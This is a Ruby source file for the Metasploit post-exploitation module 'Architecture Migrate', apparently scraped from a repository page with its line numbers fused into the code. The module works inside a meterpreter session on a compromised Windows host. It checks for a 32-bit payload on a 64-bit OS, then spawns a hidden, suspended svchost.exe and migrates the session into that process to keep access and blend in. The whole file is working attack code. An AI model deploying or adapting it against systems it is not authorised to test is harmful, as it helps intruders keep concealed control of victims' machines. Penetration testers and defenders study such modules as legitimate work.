Path: blob/master/modules/post/windows/manage/archmigrate.rb
19500 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::Windows::Registry7include Msf::Post::File8include Msf::Post::Common9include Msf::Post::Windows::Priv1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Architecture Migrate',16'Description' => %q{17This module checks if the meterpreter architecture is the same as the OS architecture and if it's incompatible it spawns a18new process with the correct architecture and migrates into that process.19},20'License' => MSF_LICENSE,21'Author' => ['Koen Riepe ([email protected])'],22'Platform' => [ 'win' ],23'Arch' => [ 'x86', 'x64' ],24'SessionTypes' => [ 'meterpreter' ],25'Compat' => {26'Meterpreter' => {27'Commands' => %w[28core_migrate29stdapi_railgun_api30stdapi_sys_process_execute31stdapi_sys_process_getpid32]33}34},35'Notes' => {36'Stability' => [CRASH_SERVICE_DOWN],37'SideEffects' => [],38'Reliability' => []39}40)41)4243register_options(44[45OptString.new('EXE', [true, 'The executable to start and migrate into', 'C:\windows\sysnative\svchost.exe']),46OptBool.new('FALLBACK', [true, 'If the selected migration executable does not exist fallback to a sysnative file', true]),47OptBool.new('IGNORE_SYSTEM', [true, 'Migrate even if you have SYSTEM privileges', false])48]49)50end5152def check_32_on_6453# railgun returns '\x00\x00\x00\x00' if the meterpreter process is 64bits.54session.railgun.kernel32.IsWow64Process(-1, 4)['Wow64Process'] != "\x00\x00\x00\x00"55rescue StandardError56print_error('Railgun not available, this module only works for binary meterpreters.')57end5859def get_windows_loc60apicall = session.railgun.kernel32.GetEnvironmentVariableA('Windir', 255, 255)['lpBuffer']61windir = apicall.split(':')[0]62return windir63end6465def do_migrate66unless check_32_on_6467print_good('The meterpreter is the same architecture as the OS!')68return69end7071print_status('The meterpreter is not the same architecture as the OS! Upgrading!')72newproc = datastore['EXE']73if exist?(newproc)74print_status("Starting new x64 process #{newproc}")75pid = session.sys.process.execute(newproc, nil, { 'Hidden' => true, 'Suspended' => true }).pid76print_good("Got pid #{pid}")77print_status('Migrating..')78session.core.migrate(pid)79if pid == session.sys.process.getpid80print_good('Success!')81else82print_error('Migration failed!')83end84else85print_error('The selected executable to migrate into does not exist')86if datastore['FALLBACK']87windir = get_windows_loc88newproc = "#{windir}:\\windows\\sysnative\\svchost.exe"89if exist?(newproc)90print_status("Starting new x64 process #{newproc}")91pid = session.sys.process.execute(newproc, nil, { 'Hidden' => true, 'Suspended' => true }).pid92print_good("Got pid #{pid}")93print_status('Migrating..')94session.core.migrate(pid)95if pid == session.sys.process.getpid96print_good('Success!')97else98print_error('Migration failed!')99end100end101end102end103end104105def run106unless is_system?107print_status('You are not running as SYSTEM. Moving on...')108do_migrate109return110end111112if datastore['IGNORE_SYSTEM']113print_error('You are running as SYSTEM! You will lose your privileges!')114do_migrate115return116end117118print_error('You are running as SYSTEM! Aborting migration.')119end120end121122123